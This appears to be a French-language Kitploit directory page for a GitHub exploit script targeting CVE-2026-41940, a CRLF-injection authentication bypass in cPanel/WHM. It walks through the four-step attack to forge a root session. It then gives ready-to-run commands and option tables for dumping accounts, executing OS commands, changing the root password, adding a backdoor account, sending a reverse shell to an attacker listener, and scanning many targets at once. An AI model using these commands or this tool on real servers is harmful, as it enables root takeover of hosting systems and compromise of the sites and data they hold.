Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-41940 — Contournement d'authentification cPanel/WHM (Vulnérabilité zero-day) | Kitploit
Outils/GitHubGitHub/kill1234545/cve-2026-41940
Authentification et AutorisationEscalade de PrivilègesMécanismes de PersistanceAnalyse des VulnérabilitésExploitationExploitation d'Applications WebPost-ExploitationTests d'Intrusion
GitHubkill1234545/cve-2026-41940

CVE-2026-41940

Contournement d'authentification cPanel/WHM (Vulnérabilité zero-day)

Voir le dépôt
102il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-41940 : Contournement d'authentification cPanel/WHM (cible unique et multi-cibles)

Avertissement : Ce document et le script associé (exploit.py) sont fournis strictement à des fins éducatives, de recherche en sécurité et de tests d'intrusion autorisés. N'utilisez pas ce logiciel contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de tester.

Vue d'ensemble

exploit.py est un script qui démontre une vulnérabilité de contournement d'authentification (CVE-2026-41940) dans cPanel & WHM. La vulnérabilité permet à un attaquant non authentifié d'injecter une session root dans le cache du démon via une faille d'injection CRLF, accordant en fin de compte un accès WHM de niveau root sans nécessiter d'identifiants valides.

Analyse de la vulnérabilité et déroulement de l'exploitation

L'exploit fonctionne en exploitant une vulnérabilité d'injection CRLF (Carriage Return Line Feed) dans le mécanisme de gestion de l'authentification Basic, combinée à une faille de propagation de session. Le script automatise l'attaque en quatre étapes :

  1. Création de session pré-authentification : Connexion aux points de terminaison de connexion publics (par exemple, /login/ ou /cgi/login.cgi) pour acquérir un cookie de session non authentifié de base (whostmgrsession).
  2. Injection CRLF : Envoi d'un en-tête d'authentification Basic forgé contenant une charge utile encodée en Base64 qui injecte directement les champs de session root dans le cache de session cpsrvd. La réponse de redirection du serveur divulgue le jeton de sécurité généré (cpsess).
  3. Propagation de session : Le cookie de session brut est envoyé à un point de terminaison WHM authentifié, déclenchant do_token_denied pour propager la session forgée dans le cache du démon — ce qui en fait une session authentifiée valide.
  4. Vérification : Accès aux points de terminaison restreints de l'API WHM (par exemple, /json-api/version) en utilisant la session forgée pour confirmer l'accès de niveau root.

Prérequis

  • Python 3.x
  • Bibliothèque requests
root@kitploit:~
pip install requests

Utilisation

root@kitploit:~
python exploit.py --target <URL> [options]
python exploit.py --target-file <FILE> [options]

Arguments

Sélection de la cible

ArgumentDescription
--target URLURL WHM unique (par exemple, https://target:2087)
--target-file FILEFichier contenant les cibles (une ip:port par ligne) — active automatiquement le mode vérification

Options réseau et principales

Options d'exploitation (après contournement)

Options de sortie

ArgumentDescription
--output FILEEnregistre le jeton de session et les détails dans un fichier JSON

Exemples

root@kitploit:~
# Check if target is vulnerable
python exploit.py --target https://target:2087 --check

# Dump server info (version, accounts, privileges)
python exploit.py --target https://target:2087 --dump

# Generate a one-click root login URL (paste in browser immediately)
python exploit.py --target https://target:2087 --session

# Execute a command
python exploit.py --target https://target:2087 --exec "id"

# Drop into an interactive WHM shell
python exploit.py --target https://target:2087 --shell

# Change root password
python exploit.py --target https://target:2087 --password 'NewP@ss!'

# Call WHM API directly
python exploit.py --target https://target:2087 --api version
python exploit.py --target https://target:2087 --api listaccts --api-params api.version=1

# Create a backdoor cPanel account
python exploit.py --target https://target:2087 --add-user myuser 'Pass123!' example.com

# Send reverse shell
python exploit.py --target https://target:2087 --revshell YOUR_IP 4444

# Override hostname (use when auto-discovery fails)
python exploit.py --target https://1.2.3.4:2087 --hostname whm.server.net --check

# Scan multiple targets (check-only mode)
python exploit.py --target-file ips.txt
python exploit.py --target-file ips.txt --threads 20

# Save session to file
python exploit.py --target https://target:2087 --dump --output results.json

Commandes du shell interactif

Lorsque vous utilisez --shell, les commandes suivantes sont disponibles :


Rappel

Appliquez immédiatement les derniers correctifs de sécurité cPanel/WHM.

Télécharger l’outil
ArgumentDescription
--threads NThreads concurrents pour le mode multi-cibles (défaut : 10)
--hostname HOSTRemplace l'en-tête Host — à utiliser lorsque la détection automatique échoue ou fournit un mauvais nom d'hôte
--timeout NDélai d'expiration par requête en secondes (défaut : 15)
--retries NNombre de nouvelles tentatives en cas d'erreurs réseau (défaut : 3)
--cookie-name NAMEForce un nom de cookie de session spécifique (détection automatique si omis)
--no-verifyIgnore la vérification de l'étape 4 et continue quand même
ArgumentDescription
--checkMode vérification uniquement — vérifie la vulnérabilité sans l'exploiter (activé automatiquement avec --target-file)
--password PASSChange le mot de passe root en PASS
--api FUNCAppelle une fonction spécifique de l'API JSON WHM
--api-params K=V,...Paramètres séparés par des virgules pour --api
--exec CMDExécute une commande du système d'exploitation via WHM scripts/run_script (repli : rawexec)
--sessionGénère une URL de connexion root en un clic — à ouvrir immédiatement, le jeton expire rapidement
--shellLance un shell WHM interactif (cible unique uniquement)
--dumpExtrait les informations du serveur : version, comptes, zones DNS, privilèges
--add-user USER PASS DOMAINCrée un nouveau compte d'hébergement cPanel
--revshell LHOST LPORTEnvoie un reverse shell bash à votre écouteur
CommandeDescription
api <function> [k=v ...]Appelle une fonction de l'API JSON WHM (par exemple, api version)
exec <command>Exécute une commande du système d'exploitation via WHM (par exemple, exec id)
passwd <newpass>Change le mot de passe root
dumpExtrait les informations du serveur
revshell <lhost> <lport>Envoie un reverse shell
add <user> <pass> <domain>Crée un compte cPanel
save <path>Enregistre la session actuelle dans un fichier
exit / quitQuitte le shell